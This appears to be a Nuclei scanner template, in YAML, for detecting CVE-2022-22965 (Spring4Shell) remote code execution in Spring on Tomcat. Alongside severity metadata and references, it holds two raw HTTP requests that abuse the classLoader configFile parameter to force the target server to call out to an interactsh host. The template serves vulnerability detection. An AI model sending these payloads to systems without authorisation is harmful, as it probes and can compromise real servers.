60 lines
2.6 KiB
YAML
60 lines
2.6 KiB
YAML
id: CVE-2022-22965
|
|
|
|
info:
|
|
name: Spring - Remote Code Execution
|
|
author: justmumu,arall,dhiyaneshDK,akincibor
|
|
severity: critical
|
|
description: |
|
|
Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
|
|
remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit.
|
|
reference:
|
|
- https://tanzu.vmware.com/security/cve-2022-22965
|
|
- https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
|
|
- https://twitter.com/RandoriAttack/status/1509298490106593283
|
|
- https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw
|
|
- https://twitter.com/_0xf4n9x_/status/1509935429365100546
|
|
- https://nvd.nist.gov/vuln/detail/cve-2022-22965
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-22965
|
|
cwe-id: CWE-94
|
|
epss-score: 0.97451
|
|
epss-percentile: 0.99948
|
|
cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 4
|
|
vendor: vmware
|
|
product: spring_framework
|
|
tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev,vmware
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST {{BaseURL}} HTTP/1.1
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
|
|
- |
|
|
GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
|
|
|
|
payloads:
|
|
interact_protocol:
|
|
- "http"
|
|
- https
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: Java"
|
|
case-insensitive: true
|
|
# digest: 4a0a00473045022100e1eb3dedea23e801a5deecff442d4a3f8c84a6eb089e1d5feba8af7132857c61022065cfd1c407be7027ddef14769b2cce9c997b177d837725e2721de06477198162:922c64590222798bb761d5b6d8e72950 |